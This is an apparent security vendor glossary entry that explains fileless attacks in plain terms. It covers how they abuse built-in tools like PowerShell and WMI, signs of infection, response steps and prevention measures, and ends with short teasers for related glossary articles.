Fileless Attacks: What they are, how they work, and ways to stop them

Fileless Attacks

What it is

A fileless attack runs malicious code directly in memory or abuses built-in tools (PowerShell, WMI, Office macros) so there’s little or nothing written to disk. That stealth lets it slip past traditional antivirus and move quickly inside a network.

How it works 

  • A booby-trapped page, email, or doc launches scripts in memory.

  • Legit tools are abused to download commands, dump creds, or move laterally (“living off the land”).

  • Persistence hides in scheduled tasks, registry, or legit admin tools - not obvious EXE files.

What you may notice

  • Brief command windows flashing, odd PowerShell activity

  • Security tools disabled or failing to update

  • New scheduled tasks/services; spikes in CPU or network from system processes

  • Alerts about script hosts or encoded commands

If you suspect it 

  1. Disconnect from the network.

  2. Run a reputable EDR/anti-malware scan; reboot and scan again.

  3. Inspect Startup, Scheduled Tasks, services, and Office add-ins; remove unknowns.

  4. From a clean device, change passwords and enable MFA.

  5. Review logs/DNS for suspicious domains and block them.

Prevent it

  • Disable macros by default; allow only signed scripts.

  • Constrain PowerShell (Constrained Language Mode), restrict WMI/PSRemoting.

  • Keep OS, Office, browsers, and drivers updated.

  • Use EDR that monitors script behavior and command-line anomalies.

  • Apply least privilege; limit local admins and use application allow-listing.

    Glossary (A–Z)

    All A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

      • Related Articles

      • Fileless Malware

        What it is Fileless malware runs from memory instead of dropping obvious files on your disk. It often abuses built-in tools (like PowerShell or WMI) and trusted apps, making it harder for traditional antivirus to spot. How it works You visit a ...

      • Data Execution Prevention

        What it is Data Execution Prevention (DEP) is a Windows safety net that stops code from running in places it shouldn’t—like the stack or heap. If malware tries to execute from those memory areas, Windows blocks it and shuts the app down instead of ...

      • Malware

        What it is Malware is any software made to harm your device or data. It can steal passwords, lock your files, spy on activity, or hijack your browser. For a quick primer and examples, see our malware explainer. How it spreads Phishing emails and fake ...

      • EDR (Endpoint Detection and Response)

        What it is EDR is your always-on security team for laptops and servers. It watches what’s happening on each device, spots attacks in progress, and helps you respond fast - quarantine, investigate, and clean up. For details on capabilities and use ...

      • Security Software

        What it is Security software is a set of apps and services that protect your devices and data from hackers, malware, and mistakes. It covers tools like antivirus/anti-malware, firewalls, VPNs, email and web filters, intrusion detection/prevention, ...